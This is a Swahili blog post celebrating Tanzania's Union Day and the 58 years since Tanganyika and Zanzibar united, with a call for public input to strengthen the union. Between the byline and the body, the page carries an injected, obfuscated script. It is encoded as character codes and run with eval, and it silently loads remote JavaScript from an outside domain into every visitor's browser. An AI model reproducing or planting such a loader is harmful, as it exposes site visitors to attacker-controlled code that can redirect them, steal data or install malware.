Recent Comments

Happy Muungano Day ila Lifanyike hili ili udumu milele

By ventas malack Apr 26, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Leo ni siku ya kumbukizi ya muungano wa Tanzania ambapo siku kama ya leo miaka 58 iliyopita yaani mwaka 1964 rasmi nchi mbili yaani Tanganyika na Zanzibar ziliungana na kuunda taifa la Tanzania.
Kiuhalisia lilionekana ni suala ambalo halitafanikiwa kabisa litakuwa la muda tu na baadae muungano utavunjika lakini mpaka sasa ni miaka 58 bado muungano upo palepale na unaonesha dalili ya kuendelea zaidi na zaidi kongole sana Tanzania kwa hilo maana nchi zingine zinatengana lakini hizi zilizoungana bado zinadumu.
Licha ya hayo yote bado kuna mambo yanahitaji tathmini ili muungano huu udumu zaidi na zaidi kipindi cha nyuma wadau wengi walikuwa wakizungumzia sana suala hili akiwemo mwanasiasa Hamphrey Polepole katika moja ya machapisho yake juu ya mapendekezo ya katiba mpya ambapo aliongelea suala la mfumo wa uongozi na suala la dini.
Kiujumla kuna haja kubwa ya kuwaruhusu wadau mbalimbali kujadili hasa jinsi gani muungano ukae na kuboreshwa zaidi ili udumu ikiwezekana hata milele na milele.
Maboresho hutokea kwa angazia kero,changamoto na malalamiiko yanayojitokeza hivyo basi kuwapa nafasi wadau mbalimbali ambapo kupitia fikra na mawazo yao inaeza kusaidia kuuboresha na kuuimarisha muungano huo, maana usichokijua hata jina Tanzania hakitengenezwa na Mwalimu Nyerere na Karume bali mdau tu mbunifu aitwaye Ikbar Mohamed baada ya kushiriki kinyang’anyiro cha ubunifu wa jina hilo kilichotangazwa na serikali kipindi hicho.
Hivyo serikali inaweza fanya hivyohivyo hata wakati huu kuuboresha  na kuuimarisha muungano, wadau wapewe tu nafasi kuutathmini na kushauri nini kifanyike.

By ventas malack

Make the World Aware